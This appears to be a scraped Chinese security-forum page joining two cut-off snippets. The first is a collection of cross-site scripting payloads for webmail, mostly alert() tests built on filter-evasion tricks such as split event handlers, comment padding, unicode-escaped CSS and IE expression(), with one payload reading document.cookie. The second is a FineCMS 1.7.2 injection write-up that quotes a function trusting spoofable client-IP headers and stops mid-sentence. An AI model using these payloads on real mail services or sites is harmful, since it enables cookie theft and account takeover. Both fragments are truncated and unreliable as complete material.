邮箱跨站代码收集

<script>alert("dddd")<script> <script>alert('test')</script> ----------------------------TOM------------------------------------------------------------------- <img src="http://www.google.cn/intl/zh-CN/images/logo_cn.gif" width=0 height=0 ononloadload="alert(52)">52 <img src="http://www.google.cn/intl/zh-CN/images/logo_cn.gif" width=0 height=0 onload="alert(53)">53 <img src="http://www.google.cn/intl/zh-CN/images/logo_cn.gif" width=0 height=0 /**/onload="alert(54)">54 <ba="<script>alert(55);</script>"55 <img/*****/src=# width=0 height=0 /***/onerror=alert(56)>56 <iframe/**/src=http://www.baidu.com>57</iframe> <img src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(58)>58 <image src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(59)>59 <style onreadystatechange=alert(60)>60</style> <xml onreadystatechange=alert(61)>xxxx</xml>61 <object type=image src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(62)>62 <img type=image src=http://www.google.cn/intl/zh-CN/images/logo_cn.gif onreadystatechange=alert(63)>63 <P STYLE="behavior:url('#default#time2')" onEnd=alert(64)>64 <P STYLE="behavior:url('#default#time2')" onBegin=alert(65)>65 <style><img src="</style><img src=x onerror=alert(66)//">66 ---------------------------------------------------------------------------------------------- <DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\002F\0078\0073\0073\002F\0029\0029"> <frameset onload=alert(1)> <IMG SRC="jav ascript:alert('XSS-1');"> <IMG """><SCRIPT>alert("XSS-2")</SCRIPT>"> Hello,80sec </xss style="x:expression(alert(document.cookie))"> <IMG SRC = " j

Finecms 1.7.2注射漏洞

漏洞文件: Client.Class.php 29行处 public static function get_user_ip() { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $onlineip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $onlineip = $_SERVER['REMOTE_ADDR']; } return $onlineip; } /* 显然可以伪造一个clien